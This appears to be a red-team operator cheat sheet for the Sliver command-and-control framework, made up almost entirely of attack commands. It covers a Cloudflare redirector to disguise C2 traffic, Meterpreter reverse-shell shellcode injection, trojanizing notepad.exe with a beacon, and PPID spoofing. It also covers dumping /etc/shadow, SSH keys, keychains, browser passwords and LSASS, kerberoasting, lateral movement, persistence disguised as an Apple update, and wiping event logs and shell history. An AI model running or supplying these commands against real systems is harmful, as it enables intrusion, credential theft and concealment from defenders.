Implant → HTTPS → Cloudflare (trusted CDN IP) → Your VPS
Blue team sees: target → Cloudflare IP (e.g. 104.18.x.x)
     ↑ Looks like legit CDN traffic

── Optional: Cloudflare Worker as redirector ──
// worker.js — check for specific cookie/header before proxying
addEventListener('fetch', event => {
  event.respondWith(handleRequest(event.request));
});
async function handleRequest(request) {
  const ua = request.headers.get('User-Agent') || '';
  if (ua.includes('Mozilla/5.0 (Windows NT 10.0')) {
    return fetch('https://vps-internal-ip.com' + new URL(request.url).pathname, request);
  }
  return new Response('404 Not Found', { status: 404 });
}

# From a Sliver session: inject a Metasploit payload into a process
# Step 1: Start MSF handler
# msfconsole → use multi/handler → set payload windows/x64/meterpreter/reverse_https
# set LHOST C2_IP, set LPORT 4444, run -j

# Step 2: Generate MSF shellcode
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=C2_IP LPORT=4444 -f raw -o /tmp/msf.bin

# Step 3: Inject via Sliver session
injection --pid 1234 /tmp/msf.bin       # inject into existing process

# Or: use the built-in msf-inject command
msf-inject --payload windows/x64/meterpreter/reverse_https --lhost C2_IP --lport 4444 --pid 1234

# Spawn MSF session without injecting into existing PID
msf-inject --payload windows/x64/meterpreter/reverse_https --lhost C2_IP --lport 4444 --process C:\Windows\System32\notepad.exe

── On your Kali operator box ──
# Start ligolo-ng proxy
./proxy -selfcert -laddr 0.0.0.0:11601

── Upload ligolo agent via Sliver session ──
upload /opt/tools/agent.exe C:\Windows\Temp\agent.exe

── Execute agent on target (connects back to Kali ligolo proxy) ──
execute -d "C:\Windows\Temp\agent.exe -connect KALI_IP:11601 -ignore-cert"

── Back on Kali ligolo proxy CLI ──
session          # select the new agent
ifconfig         # see internal interfaces
start            # start tunnel

── Add route for internal subnet on Kali ──
sudo ip route add 192.168.50.0/24 dev ligolo

── Now attack internal subnet directly, no proxychains needed ──
nmap -sCV 192.168.50.0/24
evil-winrm -i 192.168.50.10 -u admin -p 'pass'
impacket-psexec CORP/admin:'pass'@192.168.50.10

# Download a legitimate binary from target
download C:\Windows\System32\notepad.exe /tmp/notepad.exe

# Inject Sliver implant shellcode into it
backdoor --profile win-https-beacon /tmp/notepad.exe
# Output: /tmp/notepad.exe.backdoored (or --save path)

# Upload the backdoored binary back
upload /tmp/notepad.exe.backdoored C:\Users\Public\notepad.exe

# When victim runs this "notepad.exe" — your beacon fires
# Useful for: trojanizing legitimate-looking tools, supply chain simulation

# PPID spoofing via execute — make malicious process appear as child of Explorer
# Use SharpBlock or inline BOF for spoofed spawn
execute-assembly /opt/tools/SharpBlock.exe "-e C:\Windows\System32\notepad.exe -p C:\Windows\Temp\beacon.exe -ppid 1234"

# Or: sideload with PPID via custom loader
sideload --process C:\Windows\System32\svchost.exe --ppid <EXPLORER_PID> /tmp/payload.dll

# Migrate with PPID spoof
migrate --pid <TARGET_PID> --ppid <EXPLORER_PID>

# Check which PID is explorer.exe for spoofing
ps | grep explorer

# Requirements: Go 1.21+, MinGW (for Windows cross-compile), make
git clone https://github.com/BishopFox/sliver.git
cd sliver

# Build server + client
make          # builds sliver-server and sliver-client for current OS

# Cross-compile for specific targets
make linux
make macos
make windows

# Build with custom implant templates
# Place custom .go templates in: implant/sliver/
make          # auto-includes custom templates

# Build Docker container (fully isolated build env)
docker build -t sliver-build .
docker run -v $(pwd)/output:/root/output sliver-build make linux

# Verify build
./sliver-server_linux version

# Host info
info
execute -o "uname -a && id && hostname && cat /etc/os-release"
execute -o "cat /proc/version"

# Users and groups
execute -o "cat /etc/passwd"
execute -o "cat /etc/group"
execute -o "w; last; lastb 2>/dev/null | head -20"

# Sudo rights
execute -o "sudo -l 2>/dev/null"

# SUID / SGID / capabilities
execute -o "find / -perm -4000 -type f 2>/dev/null"
execute -o "getcap -r / 2>/dev/null"

# Cron jobs
execute -o "crontab -l 2>/dev/null; cat /etc/crontab; ls -la /etc/cron*"

# Services
execute -o "systemctl list-units --type=service --state=running"

# Network
ifconfig
netstat
execute -o "ss -tulnp; ip route; cat /etc/hosts; arp -a"

# Sensitive files
execute -o "find /home -name '.bash_history' -exec cat {} \; 2>/dev/null"
execute -o "find /etc /var /opt -name '*.conf' | xargs grep -l 'password\\|secret\\|key' 2>/dev/null"
cat /etc/shadow
execute -o "ls -la /root/.ssh/ 2>/dev/null && cat /root/.ssh/id_rsa 2>/dev/null"

# Upload and run LinPEAS
upload /opt/tools/linpeas.sh /tmp/lp.sh
execute -o "chmod +x /tmp/lp.sh && /tmp/lp.sh 2>/dev/null"

# Common quick wins
execute -o "sudo -l"                                          # sudo misconfig
execute -o "find / -writable -not -path '/proc/*' -type f 2>/dev/null | grep -v '/sys/' | head -30"

# Check for docker socket (instant root)
execute -o "ls -la /var/run/docker.sock 2>/dev/null && id | grep docker"

# LXD/LXC group (container escape = root)
execute -o "id | grep lxd"

# Writable /etc/passwd
execute -o "ls -la /etc/passwd /etc/shadow"

# NFS no_root_squash
execute -o "cat /etc/exports 2>/dev/null"

# Kernel exploits
execute -o "uname -r"
# Check against: https://github.com/mzet-/linux-exploit-suggester
upload /opt/tools/linux-exploit-suggester.sh /tmp/les.sh
execute -o "bash /tmp/les.sh"

# macOS Sliver implant delivery (strip quarantine)
# On delivery: xattr -c /path/to/implant_mac  (removes quarantine flag)

# macOS situational awareness
execute -o "sw_vers; uname -a; id; whoami"
execute -o "system_profiler SPHardwareDataType"
execute -o "ls /Applications/"
execute -o "ps aux | grep -E 'mdworker|mds|com.apple'"

# Keychain enumeration
execute -o "security list-keychains"
execute -o "security dump-keychain -d ~/Library/Keychains/login.keychain-db 2>/dev/null"

# Browser credentials
download "~/Library/Application Support/Google/Chrome/Default/Login Data"
download "~/Library/Application Support/Firefox/Profiles"

# SSH keys
execute -o "ls -la ~/.ssh/ && cat ~/.ssh/id_rsa 2>/dev/null"

# TCC.db (check what apps have permissions)
execute -o "sqlite3 ~/Library/Application\\ Support/com.apple.TCC/TCC.db 'SELECT service,client FROM access WHERE allowed=1' 2>/dev/null"

# LaunchAgent persistence
upload /tmp/persist.plist "~/Library/LaunchAgents/com.apple.update.plist"
execute -o "launchctl load ~/Library/LaunchAgents/com.apple.update.plist"

# Check SIP status (System Integrity Protection)
execute -o "csrutil status"

# macOS privesc — check sudo, SUID, writable LaunchDaemons
execute -o "sudo -l"
execute -o "find / -perm -4000 -type f 2>/dev/null"
execute -o "find /Library/LaunchDaemons -writable 2>/dev/null"

# Start server in verbose/debug mode
./sliver-server_linux daemon --log-level 4         # 4=debug

# View server logs
journalctl -u sliver -f                              # if running as systemd service
cat ~/.sliver/logs/sliver.log

# Debug implant generation (verbose output)
generate --mtls C2_IP:8888 --os windows -G        # -G = debug/save Go code

# Check active jobs
jobs

# Ping implant (check if alive)
ping                                                  # from within session

# Convert beacon to interactive session (temporarily)
interactive                                           # opens real-time session from beacon

# Reconfigure beacon sleep without rebuilding
reconfig --sleep 30s --jitter 10

── Post-engagement cleanup (Windows) ──
rm C:\Windows\Temp\beacon.exe
rm C:\Windows\Temp\*.dmp
rm C:\Windows\Temp\*.zip
execute -o "schtasks /delete /tn 'SysUpdate' /f"
execute -o "sc stop MalSvc && sc delete MalSvc"
registry rm --hive HKCU --key "Software\Microsoft\Windows\CurrentVersion\Run" --value "WindowsUpdate"
# Clear Windows event logs (OPSEC — noisy, may trigger alerts)
execute -o "wevtutil cl System && wevtutil cl Security && wevtutil cl Application"

── Post-engagement cleanup (Linux) ──
execute -o "rm /tmp/.update /tmp/lp.sh /tmp/les.sh 2>/dev/null"
execute -o "crontab -r"
execute -o "systemctl disable netupdate && rm /etc/systemd/system/netupdate.service"
execute -o "history -c && cat /dev/null > ~/.bash_history"

── Server cleanup ──
sessions prune                # remove dead sessions
beacons prune                 # remove stale beacons

═══ 1. SETUP ═══
./sliver-server_linux daemon
./sliver-client_linux

═══ 2. LISTENER ═══
https --domain c2.yourdomain.com

═══ 3. GENERATE IMPLANT ═══
generate beacon --https c2.yourdomain.com --os windows --seconds 60 --jitter 20 --obfuscate --evasion --save /tmp/payload.exe

═══ 4. CATCH SESSION ═══
beacons
use <ID>
info

═══ 5. SITUATIONAL AWARENESS ═══
whoami | ps | ifconfig | netstat
execute -o "net user /domain"
execute -o "net localgroup administrators"
armory install Seatbelt && seatbelt -group=all

═══ 6. RECON AD ═══
sharp-hound -c All
download C:\Windows\Temp\*.zip

═══ 7. PRIVESC / CREDS ═══
sharp-up audit
getsystem
procdump --pid <LSASS_PID> --save /tmp/lsass.dmp
# Offline: mimikatz → sekurlsa::minidump lsass.dmp → sekurlsa::logonpasswords

═══ 8. KERBEROS ATTACKS ═══
rubeus kerberoast /nowrap /outfile:C:\Temp\tgs.txt
# hashcat -m 13100 tgs.txt rockyou.txt

═══ 9. LATERAL ═══
make-token --username admin --domain CORP --password 'CrackedPass'
upload /tmp/beacon.exe \\NEWHOST\C$\Windows\Temp\
execute -o "wmic /node:NEWHOST process call create 'C:\Windows\Temp\beacon.exe'"

═══ 10. PIVOT (isolated subnet) ═══
socks5 start --port 1080
# proxychains <tool> against internal subnet

═══ 11. CLEANUP ═══
rm C:\Windows\Temp\beacon.exe
rm C:\Windows\Temp\*.zip
sessions prune

# Quick host overview
execute -o "systeminfo | findstr /B /C:'Host Name' /C:'OS Name' /C:'OS Version' /C:'Domain'"

# Find domain controllers
execute -o "nltest /dclist:DOMAIN"

# Find domain admins
execute -o "net group 'Domain Admins' /domain"

# Check AppLocker
execute -o "Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections"

# Find MSSQL servers in domain
execute -o "setspn -T DOMAIN -Q MSSQLSvc/*"

# Check for writable shares
execute -o "net view \\DC01 /all"

# Dump DPAPI browser passwords
sharp-dpapi machinetriage

# Certify quick check
certify find /vulnerable